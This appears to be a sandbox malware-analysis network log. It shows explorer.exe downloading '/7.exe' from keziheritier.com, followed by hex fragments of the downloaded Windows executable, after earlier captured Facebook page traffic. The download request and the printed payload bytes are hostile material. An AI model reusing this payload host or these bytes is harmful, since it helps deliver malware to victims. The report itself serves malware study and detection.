5f 6f 61 75 74 68 5f 63 6c 69 65 6e 74 5f 65 76 65 6e 74 73 3a 74 72 75 65 2c 67 72 61 70
                                                                                                                Data Ascii: S-QxyGE0BofENThqPTL2XrjQ"]},-1],["BanzaiConfig",[],{MAX_SIZE:10000,MAX_WAIT:150000,MIN_WAIT:null,RESTORE_WAIT:150000,blacklist:["time_spent"],disabled:false,gks:{boosted_pagelikes:true,mercury_send_error_logging:true,platform_oauth_client_events:true,grap
                                                                                                                2022-10-13 11:08:15 UTC4953INData Raw: 39 0d 0a 67 37 54 30 63 41 6b 77 61 63 77 48 7a 5a 45 5a 2d 42 75 42 48 77 7a 2d 51 62 47 4a 56 4b 77 65 6d 52 5f 63 7a 75 32 68 2d 6b 76 5a 58 79 6f 46 6a 57 6e 6f 39 4d 70 7a 77 50 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 39 38 33 38 34 34 22 2c 5b 5d 2c 7b 5f 5f 72 63 3a 5b 6e 75 6c 6c 2c 22 41 61 33 6d 58 58 54 31 6b 7a 46 35 57 7a 47 4b 56 5a 56 49 62 34 65 61 6e 4a 67 71 6b 7a 48 67 32 72 5f 57 4a 6e 79 6a 59 41 63 43 53 61 4a 67 75 4c 52 6a 6c 54 35 36 4c 4e 53 2d 51 78 79 47 45 30 42 6f 66 45 4e 54 68 71 50 54 4c 32 58 72 6a 51 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 33 34 34 34 38 37 22 2c 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b 65 64 2d 70 72 6f 64 2e 63 6c 61 73 73 69 63 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 52 65 61 63 74 44 4f 4d 46 6f 72 6b
                                                                                                                Data Ascii: 9g7T0cAkwacwHzZEZ-BuBHwz-QbGJVKwemR_czu2h-kvZXyoFjWno9MpzwPQ"]},-1],["cr:983844",[],{__rc:[null,"Aa3mXXT1kzF5WzGKVZVIb4eanJgqkzHg2r_WJnyjYAcCSaJguLRjlT56LNS-QxyGE0BofENThqPTL2XrjQ"]},-1],["cr:1344487",["ReactDOMForked-prod.classic"],{__rc:["ReactDOMFork
                                                                                                                2022-10-13 11:08:15 UTC4955INData Raw: 61 48 79 52 74 62 68 78 35 79 46 36 2d 72 4c 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 63 72 3a 31 31 38 37 31 35 39 22 2c 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 5d 2c 7b 5f 5f 72 63 3a 5b 22 42 6c 75 65 43 6f 6d 70 61 74 42 72 6f 6b 65 72 22 2c 22 41 61 32 7a 70 6a 36 7a 31 31 37 34 5f 51 30 48 55 77 55 48 36 42 41 48 50 6e 6e 67 41 32 41 35 34 65 78 52 2d 54 54 4d 53 41 61 74 38 4a 49 71 55 4f 61 51 79 59 57 64 42 79 6b 6b 41 6a 69 56 62 7a 5a 44 55 64 73 59 61 32 44 61 48 79 52 74 62 68 78 35 79 46 36 2d 72 4c 63 22 5d 7d 2c 2d 31 5d 2c 5b 22 49 6d 6d 65 64 69 61 74 65 41 63 74 69 76 65 53 65 63 6f 6e 64 73 43 6f 6e 66 69 67 22 2c 5b 5d 2c 7b 73 61 6d 70 6c 69 6e 67 5f 72 61 74 65 3a 30 7d 2c 34 32 33 5d 5d 2c 72 65 71 75 69 72 65 3a 5b 5b 22
                                                                                                                Data Ascii: aHyRtbhx5yF6-rLc"]},-1],["cr:1187159",["BlueCompatBroker"],{__rc:["BlueCompatBroker","Aa2zpj6z1174_Q0HUwUH6BAHPnngA2A54exR-TTMSAat8JIqUOaQyYWdBykkAjiVbzZDUdsYa2DaHyRtbhx5yF6-rLc"]},-1],["ImmediateActiveSecondsConfig",[],{sampling_rate:0},423]],require:[["
                                                                                                                2022-10-13 11:08:15 UTC4956INData Raw: 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 64 61 74 72 22 2c 22 6e 5f 46 48 59 36 6e 6b 67 62 6e 4c 37 54 77 4a 72 37 54 37 65 67 4b 50 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 74 72 75 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 44 65 66 65 72 72 65 64 43 6f 6f 6b 69 65 22 2c 22 61 64 64 54 6f 51 75 65 75 65 22 2c 5b 5d 2c 5b 22 5f 6a 73 5f 73 62 22 2c 22 6e 5f 46 48 59 5f 49 47 4e 6f 64 42 48 63 72 4a 57 6b 30 30 50 4b 33 6a 22 2c 36 33 30 37 32 30 30 30 30 30 30 2c 22 2f 22 2c 66 61 6c 73 65 2c 66 61 6c 73 65 2c 74 72 75 65 5d 5d 2c 5b 22 43 6c 69 63 6b 52 65 66 4c 6f 67 67 65 72 22 5d 2c 5b 22 44 65 74 65 63 74 42 72 6f 6b 65 6e 50 72 6f 78 79 43 61 63 68 65 22 2c 22 72 75 6e 22 2c 5b 5d 2c 5b 30 2c 22 63 5f 75 73 65 72 22 5d
                                                                                                                Data Ascii: Queue",[],["_js_datr","n_FHY6nkgbnL7TwJr7T7egKP",63072000000,"/",true,false,true]],["DeferredCookie","addToQueue",[],["_js_sb","n_FHY_IGNodBHcrJWk00PK3j",63072000000,"/",false,false,true]],["ClickRefLogger"],["DetectBrokenProxyCache","run",[],[0,"c_user"]


                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                9192.168.2.54974166.96.149.30443C:\Windows\explorer.exe
                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                2022-10-13 11:08:16 UTC4957OUTGET /7.exe HTTP/1.1
                                                                                                                Connection: Keep-Alive
                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                Host: keziheritier.com
                                                                                                                2022-10-13 11:08:16 UTC4958INHTTP/1.1 200 OK
                                                                                                                Date: Thu, 13 Oct 2022 11:08:16 GMT
                                                                                                                Content-Type: application/octet-stream
                                                                                                                Content-Length: 718848
                                                                                                                Connection: close
                                                                                                                Server: Apache/2
                                                                                                                Last-Modified: Thu, 13 Oct 2022 08:00:30 GMT
                                                                                                                Accept-Ranges: bytes
                                                                                                                Cache-Control: max-age=14400
                                                                                                                Etag: "af800-5eae5e727375d"
                                                                                                                Expires: Thu, 13 Oct 2022 13:36:04 GMT
                                                                                                                Age: 5532
                                                                                                                2022-10-13 11:08:16 UTC4958INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 b4 c0 e6 8e f0 a1 88 dd f0 a1 88 dd f0 a1 88 dd e4 ca 8b dc e1 a1 88 dd e4 ca 8d dc 56 a1 88 dd e4 ca 8c dc e6 a1 88 dd e4 ca 89 dc f3 a1 88 dd f0 a1 89 dd a8 a1 88 dd 90 db 8c dc e1 a1 88 dd 90 db 8b dc e5 a1 88 dd 90 db 8d dc bb a1 88 dd 94 db 81 dc f1 a1 88 dd 94 db 8a dc f1 a1 88 dd 52 69 63 68 f0 a1 88 dd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$VRich
                                                                                                                2022-10-13 11:08:16 UTC4974INData Raw: 8b f9 b9 ff ff ff 7f 3b d9 77 61 8b 47 14 51 50 53 89 45 f8 e8 75 06 00 00 33 c9 8b f0 83 c0 01 0f 92 c1 f7 d9 0b c8 51 e8 31 02 00 00 8b c8 89 5f 10 0f be 45 10 53 50 51 89 4d fc 89 77 14 e8 5b e3 01 00 8b 75 fc 83 c4 1c 8b 4d f8 c6 04 1e 00 83 f9 10 72 0b 41 51 ff 37 e8 9d 01 00 00 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 65 c8 ff ff cc 55 8b ec 83 ec 0c 8b 45 10 53 8b 5d 08 56 57 8b f9 89 45 fc b9 ff ff ff 7f 3b d9 77 5d 8b 47 14 51 50 53 89 45 f4 e8 f1 05 00 00 33 c9 8b f0 83 c0 01 0f 92 c1 f7 d9 0b c8 51 e8 ad 01 00 00 53 ff 75 fc 89 45 f8 50 89 5f 10 89 77 14 e8 db d7 01 00 8b 75 f8 83 c4 1c 8b 4d f4 c6 04 1e 00 83 f9 10 72 0b 41 51 ff 37 e8 1d 01 00 00 59 59 89 37 8b c7 5f 5e 5b c9 c2 0c 00 e8 e5 c7 ff ff cc 55 8b ec 83 ec 14 8b 45 10 8b 55 08 53
                                                                                                                Data Ascii: ;waGQPSEu3Q1_ESPQMw[uMrAQ7YY7_^[eUES]VWE;w]GQPSE3QSuEP_wuMrAQ7YY7_^[UEUS
                                                                                                                2022-10-13 11:08:17 UTC4990INData Raw: 7d 97 00 74 48 80 7d 95 00 75 0d 8b cb e8 fe 0b 00 00 8b 55 cc 8b 4d b8 8a 43 05 3a 45 97 75 2d 6a 00 8d 4d b8 e8 65 de ff ff 47 8b cb e8 63 07 00 00 ff b5 74 ff ff ff 8b cb e8 0d 16 00 00 84 c0 0f 84 0f ff ff ff 8b 55 cc 8b 4d b8 85 ff 74 19 8d 45 b8 83 fa 10 72 02 8b c1 80 3c 38 00 7e 37 47 eb 06 8b 55 cc 8b 4d b8 8b 85 7c ff ff ff 85 ff 74 28 8a 00 3c 7f 74 22 83 ef 01 74 34 8d 5d b8 89 5d 88 83 fa 10 72 03 89 4d 88 8b 5d 88 3a 04 3b 8b 5d 80 74 37 c6 45 96 01 8d 4d b8 c6 45 fc 01 e8 e6 a8 ff ff 8b bd 74 ff ff ff e9 af 00 00 00 85 ff 75 18 8d 5d b8 89 5d 88 83 fa 10 72 03 89 4d 88 8b 5d 88 3a 03 8b 5d 80 7c c9 8b 85 7c ff ff ff 40 80 38 00 7e 8f 89 85 7c ff ff ff eb 8d 57 8b cb e8 61 15 00 00 84 c0 75 73 80 7b 04 00 75 07 8b cb e8 14 0b 00 00 8a 43 05
                                                                                                                Data Ascii: }tH}uUMC:Eu-jMeGctUMtEr<8~7GUM|t(<t"t4]]rM]:;]t7EMEtu]]rM]:]||@8~|Waus{uC
                                                                                                                2022-10-13 11:08:17 UTC5006INData Raw: 01 00 6a 00 8d 4d ec e8 88 88 ff ff 8b 35 84 c8 4a 00 b9 20 c8 4a 00 83 65 fc 00 89 75 f0 e8 1d 4f ff ff 8b 4d 08 50 e8 dc 4f ff ff 8b f8 85 ff 75 43 85 f6 74 04 8b fe eb 3b ff 75 08 8d 45 f0 50 e8 84 2b 00 00 59 59 83 f8 ff 74 38 8b 7d f0 89 7d f0 57 c6 45 fc 01 e8 f6 a8 ff ff 8b 07 59 8b 70 04 8b ce ff 15 64 31 47 00 8b cf ff d6 89 3d 84 c8 4a 00 8d 4d ec e8 7e 88 ff ff 8b c7 e8 cf 41 01 00 c3 e8 d0 4c ff ff cc 6a 08 b8 a2 03 47 00 e8 ee 41 01 00 6a 00 8d 4d ec e8 f3 87 ff ff 8b 35 50 c8 4a 00 b9 f8 c7 4a 00 83 65 fc 00 89 75 f0 e8 88 4e ff ff 8b 4d 08 50 e8 47 4f ff ff 8b f8 85 ff 75 43 85 f6 74 04 8b fe eb 3b ff 75 08 8d 45 f0 50 e8 5b 2b 00 00 59 59 83 f8 ff 74 38 8b 7d f0 89 7d f0 57 c6 45 fc 01 e8 61 a8 ff ff 8b 07 59 8b 70 04 8b ce ff 15 64 31 47
                                                                                                                Data Ascii: jM5J JeuOMPOuCt;uEP+YYt8}}WEYpd1G=JM~ALjGAjM5PJJeuNMPGOuCt;uEP[+YYt8}}WEaYpd1G
                                                                                                                2022-10-13 11:08:17 UTC5022INData Raw: 22 83 7d b0 10 8d 55 9c 89 95 74 ff ff ff 72 06 89 8d 74 ff ff ff 8b 95 74 ff ff ff 3a 02 8b 55 b0 7c bf 8b 85 60 ff ff ff 40 80 38 00 0f 8e 72 ff ff ff 89 85 60 ff ff ff e9 6d ff ff ff 56 8b cb e8 a3 a7 00 00 84 c0 0f 85 86 00 00 00 80 7b 04 00 75 07 8b cb e8 ae 45 00 00 66 8b 43 06 66 89 85 7c ff ff ff 8d 85 7c ff ff ff 50 8d 45 ec 50 8d 45 b4 50 e8 6e 9c ff ff 8d 4d b4 83 c4 0c 2b c1 d1 f8 83 f8 16 73 45 8b 8d 70 ff ff ff 39 8d 68 ff ff ff 7f 08 ff 85 78 ff ff ff eb 18 85 c0 75 04 85 c9 74 10 8a 80 f0 4e 47 00 88 07 47 41 89 8d 70 ff ff ff 8b cb c6 45 83 01 e8 ce 2f 00 00 56 8b cb e8 1f a7 00 00 84 c0 74 80 89 bd 5c ff ff ff 80 7d 83 00 74 13 83 bd 70 ff ff ff 00 75 0a c6 07 30 47 89 bd 5c ff ff ff 56 8b cb e8 f4 a6 00 00 84 c0 75 3f 38 43 04 75 07 8b
                                                                                                                Data Ascii: "}Utrtt:U|`@8r`mV{uEfCf||PEPEPnM+sEp9hxutNGGApE/Vt\}tpu0G\Vu?8Cu
                                                                                                                2022-10-13 11:08:17 UTC5038INData Raw: 47 ff ff 83 c4 10 e8 48 c2 00 00 c3 6a 0c b8 b6 13 47 00 e8 6d c2 00 00 8b 45 0c 33 db 8b 7d 14 8b c8 83 e1 02 89 4d ec 74 62 b9 24 c7 4a 00 e8 0c cf fe ff 85 ff 75 3c 6a 44 89 45 f0 e8 29 be 00 00 8b f0 89 75 e8 59 85 f6 74 15 ff 75 08 8b ce 89 5e 04 c7 06 84 49 47 00 e8 b8 f2 ff ff eb 02 8b f3 ff 75 f0 56 ff 75 10 e8 4a 47 ff ff 83 c4 0c eb 15 57 8b f0 e8 95 75 ff ff 56 50 ff 75 10 e8 33 47 ff ff 83 c4 10 8b 45 0c a8 08 0f 84 f8 00 00 00 b9 d4 c7 4a 00 e8 a2 ce fe ff 89 45 f0 85 ff 75 1e 6a 08 e8 bf bd 00 00 89 45 e8 59 85 c0 74 0b 89 58 04 c7 00 48 4a 47 00 eb 0b 8b c3 eb 07 57 e8 44 7c ff ff 59 ff 75 f0 8b 75 10 50 56 e8 e2 46 ff ff 83 c4 0c b9 d8 c7 4a 00 e8 5c ce fe ff 89 45 f0 85 ff 75 1e 6a 08 e8 79 bd 00 00 89 45 e8 59 85 c0 74 0b 89 58 04 c7 00
                                                                                                                Data Ascii: GHjGmE3}Mtb$Ju<jDE)uYtu^IGuVuJGWuVPu3GEJEujEYtXHJGWD|YuuPVFJ\EujyEYtX
                                                                                                                2022-10-13 11:08:17 UTC5054INData Raw: 75 10 ff 75 0c 50 e8 6e 29 00 00 6a 02 5e 8b 08 8b 40 04 89 75 ec eb 79 8b 75 ec 83 fe 02 75 28 8b 75 24 8d 45 14 53 83 c6 10 56 6a 0c 6a 01 50 8d 45 0c 50 ff 75 f0 e8 d7 97 ff ff 09 07 83 c4 1c ff 0e e9 81 00 00 00 8b 45 24 83 fe 01 75 1f 53 83 c0 0c 50 6a 1f 56 8d 45 14 50 8d 45 0c 50 ff 75 f0 e8 ab 97 ff ff 83 c4 1c 09 07 eb 5a 8b 4d f0 50 57 ff 75 1c 8d 45 e0 ff 75 18 ff 75 14 ff 75 10 ff 75 0c 50 e8 cd 29 00 00 8b 08 8b 40 04 89 45 10 89 4d 0c eb 30 80 7d 10 00 75 08 8d 4d 0c e8 90 c5 ff ff 8b 03 ff 75 12 6a 48 8b 70 10 8b ce ff 15 64 31 47 00 8b cb ff d6 84 c0 74 18 8d 4d 0c e8 ed af ff ff 8d 45 14 50 8d 4d 0c e8 4e 27 00 00 84 c0 74 c0 8d 45 14 50 8d 4d 0c e8 3e 27 00 00 84 c0 75 61 38 45 10 75 08 8d 4d 0c e8 41 c5 ff ff 8b 03 6a 00 ff 75 12 8b 70
                                                                                                                Data Ascii: uuPn)j^@uyuu(u$ESVjjPEPuE$uSPjVEPEPuZMPWuEuuuuP)@EM0}uMujHpd1GtMEPMN'tEPM>'ua8EuMAjup
                                                                                                                2022-10-13 11:08:17 UTC5070INData Raw: 0c e8 ea 4f fe ff 50 8d 4d b8 e8 ad 4d fe ff 83 66 04 00 43 89 5d f0 53 50 8b ce c7 45 fc 02 00 00 00 c7 06 4c 50 47 00 88 5e 28 e8 10 0f 00 00 c7 06 b4 50 47 00 eb 02 33 f6 89 37 f6 c3 01 74 08 8d 4d b8 e8 e0 4d fe ff 6a 03 58 e8 02 42 00 00 c3 6a 3c b8 cc 20 47 00 e8 27 42 00 00 8b 7d 08 33 db 89 5d f0 85 ff 74 64 39 1f 75 60 6a 58 e8 f6 3d 00 00 8b f0 59 89 75 ec 21 5d fc 85 f6 74 3b 8b 4d 0c e8 66 4f fe ff 50 8d 4d b8 e8 29 4d fe ff 83 66 04 00 43 89 5d f0 53 50 8b ce c7 45 fc 02 00 00 00 c7 06 4c 50 47 00 c6 46 28 00 e8 8b 0e 00 00 c7 06 80 50 47 00 eb 02 33 f6 89 37 f6 c3 01 74 08 8d 4d b8 e8 5b 4d fe ff 6a 03 58 e8 7d 41 00 00 c3 6a 3c b8 14 21 47 00 e8 a2 41 00 00 8b 7d 08 33 f6 8b de 89 5d f0 85 ff 74 49 39 37 75 45 6a 44 e8 6f 3d 00 00 59 89 45
                                                                                                                Data Ascii: OPMMfC]SPELPG^(PG37tMMjXBj< G'B}3]td9u`jX=Yu!]t;MfOPM)MfC]SPELPGF(PG37tM[MjX}Aj<!GA}3]tI97uEjDo=YE
                                                                                                                2022-10-13 11:08:17 UTC5086INData Raw: 01 75 13 ff 75 10 8b 4d 14 50 ff 75 08 ff 15 64 31 47 00 ff 55 14 ff 75 1c ff 75 18 e8 77 d7 02 00 59 59 5d c3 e8 9e 0e 00 00 85 c0 74 0c 68 dc c8 4a 00 e8 da 17 03 00 59 c3 e8 31 ef 02 00 85 c0 0f 84 04 ef 02 00 c3 6a 00 e8 25 1a 03 00 59 e9 d4 54 00 00 55 8b ec 83 7d 08 00 75 07 c6 05 d8 c8 4a 00 01 e8 8a 0c 00 00 e8 6e 54 00 00 84 c0 75 04 32 c0 5d c3 e8 a3 19 03 00 84 c0 75 0a 6a 00 e8 8b 54 00 00 59 eb e9 b0 01 5d c3 55 8b ec 80 3d d9 c8 4a 00 00 74 04 b0 01 5d c3 56 8b 75 08 85 f6 74 05 83 fe 01 75 62 e8 18 0e 00 00 85 c0 74 26 85 f6 75 22 68 dc c8 4a 00 e8 7d 17 03 00 59 85 c0 75 0f 68 e8 c8 4a 00 e8 6e 17 03 00 59 85 c0 74 2b 32 c0 eb 30 83 c9 ff 89 0d dc c8 4a 00 89 0d e0 c8 4a 00 89 0d e4 c8 4a 00 89 0d e8 c8 4a 00 89 0d ec c8 4a 00 89 0d f0 c8
                                                                                                                Data Ascii: uuMPud1GUuuwYY]thJY1j%YTU}uJnTu2]ujTY]U=Jt]Vutubt&u"hJ}YuhJnYt+20JJJJJ
                                                                                                                2022-10-13 11:08:17 UTC5102INData Raw: 02 02 00 00 0f b6 72 12 0f b6 41 12 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 e0 01 00 00 0f b6 72 13 0f b6 41 13 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 be 01 00 00 8b 42 14 3b 41 14 0f 84 87 00 00 00 0f b6 f0 0f b6 41 14 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 91 01 00 00 0f b6 72 15 0f b6 41 15 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 6f 01 00 00 0f b6 72 16 0f b6 41 16 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 4d 01 00 00 0f b6 72 17 0f b6 41 17 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff ff 85 f6 0f 85 2b 01 00 00 8b 42 18 3b 41 18 0f 84 87 00 00 00 0f b6 f0 0f b6 41 18 2b f0 74 0e 33 c0 85 f6 0f 9f c0 8d 34 45 ff ff ff
                                                                                                                Data Ascii: rA+t34ErA+t34EB;AA+t34ErA+t34EorA+t34EMrA+t34E+B;AA+t34E
                                                                                                                2022-10-13 11:08:17 UTC5118INData Raw: 02 00 00 8b 45 0c 8d 4d f0 50 e8 93 f6 ff ff 8b 55 ec b9 00 7c 00 00 8b c2 23 c1 89 45 cc 85 f6 75 7b 3d 00 68 00 00 74 61 3d 00 70 00 00 74 5a 3d 00 60 00 00 75 66 8b 45 f0 8d 4d f8 89 45 f8 8b 45 f4 6a 7b c7 45 c4 dc 5c 47 00 c7 45 c8 02 00 00 00 89 45 fc e8 9e f6 ff ff 8d 45 ac 57 50 e8 d3 1e 00 00 59 59 8d 45 ac 50 8d 45 d4 50 8d 4d f8 e8 31 f5 ff ff 8d 4d c4 51 ff 75 08 8b c8 e8 01 f5 ff ff e9 ba f8 ff ff 8d 45 f0 50 ff 75 08 e8 53 53 00 00 59 59 e9 a7 f8 ff ff 8b c2 25 00 fc 00 00 3b c1 75 0e 8d 45 f0 50 ff 75 08 e8 d4 52 00 00 eb e0 8b fa 8b da 81 e7 00 60 00 00 81 e3 00 18 00 00 33 c0 89 7d e4 85 f6 74 08 81 fb 00 08 00 00 eb 02 85 ff 0f 94 c0 8b ca 81 e1 00 10 00 00 89 4d b8 8b ca 81 e1 00 04 00 00 85 c0 89 4d c0 8b c1 75 03 8b 45 b8 85 c0 74 31
                                                                                                                Data Ascii: EMPU|#Eu{=hta=ptZ=`ufEMEEj{E\GEEEWPYYEPEPM1MQuEPuSSYY%;uEPuR`3}tMMuEt1
                                                                                                                2022-10-13 11:08:17 UTC5134INData Raw: 00 c6 46 04 02 eb 4b 83 3e 00 6a 01 75 09 8b ce e8 8d b4 ff ff eb 3b 8d 4d a0 c7 45 f0 c8 5b 47 00 c7 45 f4 02 00 00 00 e8 a7 b1 ff ff 8d 4d f0 51 8d 4d a8 51 8b c8 e8 4a b5 ff ff 56 8d 4d b0 51 8b c8 e8 60 b5 ff ff 8b 08 89 0e 8b 48 04 89 4e 04 5f 8b c6 5e 5b c9 c3 55 8b ec 83 ec 20 8d 45 f8 53 56 8b 75 08 57 33 ff 57 6a 01 50 89 3e 89 7e 04 e8 c5 14 00 00 83 c4 0c 8b 08 8b d1 89 0e 8b 40 04 84 c0 89 46 04 a1 8c cc 4a 00 75 4d 8a 18 84 db 74 47 80 fb 40 74 42 8d 45 f0 c7 45 f8 c8 5b 47 00 50 c7 45 fc 02 00 00 00 e8 e9 fb ff ff 59 8d 4d f8 51 8d 4d e8 51 8b c8 e8 c4 b4 ff ff 56 8d 4d e0 51 8b c8 e8 da b4 ff ff 8b 10 89 16 8b 40 04 89 46 04 a1 8c cc 4a 00 8a 08 80 f9 40 75 08 40 a3 8c cc 4a 00 eb 59 84 c9 74 0b 89 7e 04 c6 46 04 02 89 3e eb 4a 6a 01 85 d2
                                                                                                                Data Ascii: FK>ju;ME[GEMQMQJVMQ`HN_^[U ESVuW3WjP>~@FJuMtG@tBEE[GPEYMQMQVMQ@FJ@u@JYt~F>Jj
                                                                                                                2022-10-13 11:08:17 UTC5150INData Raw: 8b 41 14 8a 48 fc 8b 45 08 88 08 b0 01 5d c2 04 00 8b ff 55 8b ec 83 b9 5c 04 00 00 01 75 0d 83 41 14 04 8b 49 14 0f b7 41 fc eb 4f 8b 91 a8 0a 00 00 83 fa 63 76 14 e8 b3 36 01 00 c7 00 16 00 00 00 e8 99 fc 00 00 32 c0 eb 3b 03 d2 83 b9 58 04 00 00 01 75 1b ff 71 2c 0f b6 41 31 50 8d 81 64 04 00 00 6a 01 8d 04 d0 50 e8 23 df 00 00 eb 15 8b 84 d1 6c 04 00 00 0f b7 00 8b 4d 08 99 89 01 b0 01 89 51 04 5d c2 04 00 8b ff 55 8b ec 83 b9 5c 04 00 00 01 75 0d 83 41 14 04 8b 49 14 0f b7 41 fc eb 4f 8b 91 a8 0a 00 00 83 fa 63 76 14 e8 3a 36 01 00 c7 00 16 00 00 00 e8 20 fc 00 00 32 c0 eb 3b 03 d2 83 b9 58 04 00 00 01 75 1b ff 71 2c 0f b6 41 31 50 8d 81 64 04 00 00 6a 01 8d 04 d0 50 e8 f5 de 00 00 eb 15 8b 84 d1 6c 04 00 00 0f b7 00 8b 4d 08 99 89 01 b0 01 89 51 04
                                                                                                                Data Ascii: AHE]U\uAIAOcv62;Xuq,A1PdjP#lMQ]U\uAIAOcv:6 2;Xuq,A1PdjPlMQ
                                                                                                                2022-10-13 11:08:17 UTC5166INData Raw: c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 33 c0 40 c3 6a 04 58 c3 6a 02 58 c3 6a 02 58 c3 33 c0 40 c3 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff 55 8b ec 8b 45 08 85 41 20 0f 95 c0 5d c2 04 00 8b ff
                                                                                                                Data Ascii: @3@3@3@jXjXjX3@3@3@3@3@jXjXjX3@3@3@3@3@jXjXjX3@3@3@3@3@jXjXjX3@UEA ]UEA ]UEA ]UEA ]UEA ]UEA ]UEA ]
                                                                                                                2022-10-13 11:08:17 UTC5182INData Raw: 07 74 56 48 83 e8 01 75 e3 53 8b ce e8 f9 2f 00 00 eb d1 8b ce e8 31 19 00 00 eb c8 83 f8 70 7f 4d 74 3f 83 f8 67 7e 31 83 f8 69 74 1c 83 f8 6e 74 0e 83 f8 6f 75 b5 8b ce e8 0a 4d 00 00 eb a4 8b ce e8 27 48 00 00 eb 9b 83 4e 20 10 53 6a 0a 8b ce e8 17 3a 00 00 eb 8b 8b ce e8 82 20 00 00 eb 82 8b ce e8 3e 4e 00 00 e9 76 ff ff ff 83 e8 73 0f 84 66 ff ff ff 48 83 e8 01 74 d0 83 e8 03 0f 85 66 ff ff ff 53 e9 69 ff ff ff 38 5e 30 0f 85 2e 01 00 00 8b cb 66 89 5d fc 88 5d fe 33 d2 8b 5e 20 42 8b c3 89 4d f8 c1 e8 04 84 c2 74 2f 8b c3 c1 e8 06 84 c2 74 06 c6 45 fc 2d eb 08 84 da 74 0b c6 45 fc 2b 8b ca 89 4d f8 eb 11 8b c3 d1 e8 84 c2 74 09 c6 45 fc 20 8b ca 89 55 f8 8a 56 31 80 fa 78 74 05 80 fa 58 75 0d 8b c3 c1 e8 05 a8 01 74 04 b3 01 eb 02 32 db 80 fa 61 74
                                                                                                                Data Ascii: tVHuS/1pMt?g~1itntouM'HN Sj: >NvsfHtfSi8^0.f]]3^ BMt/tE-tE+MtE UV1xtXut2at
                                                                                                                2022-10-13 11:08:17 UTC5198INData Raw: 00 59 8b c8 89 45 fc 83 e9 01 0f 84 81 00 00 00 83 e9 01 74 5e 49 83 e9 01 74 3a 83 e9 04 74 17 e8 ca 76 00 00 c7 00 16 00 00 00 e8 b0 3c 00 00 32 c0 e9 2f 01 00 00 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 3d 52 ff ff eb 5f e8 ce 54 ff ff eb 58 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 f5 42 ff ff eb 41 e8 54 45 ff ff eb 3a 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 f7 3c ff ff eb 23 e8 74 40 ff ff eb 1c 8b 46 20 8b ce c1 e8 04 a8 01 8d 45 f4 50 74 07 e8 19 38 ff ff eb 05 e8 72 3a ff ff 84 c0 0f 84 7b ff ff ff 8b ce e8 78 99 ff ff 84 c0 0f 84 a0 00 00 00 8b 4e 20 8b c1 53 8b 5d f8 c1 e8 04 57 8b 7d f4 a8 01 74 17 85 db 7f 13 7c 04 85 ff 73 0d f7 df 83 d3 00 f7 db 83 c9 40 89 4e 20 83 7e 28 00 7d 09 c7 46 28 01 00 00 00 eb 11 ff
                                                                                                                Data Ascii: YEt^It:tv<2/F EPt=R_TXF EPtBATE:F EPt<#t@F EPt8r:{xN S]W}t|s@N ~(}F(
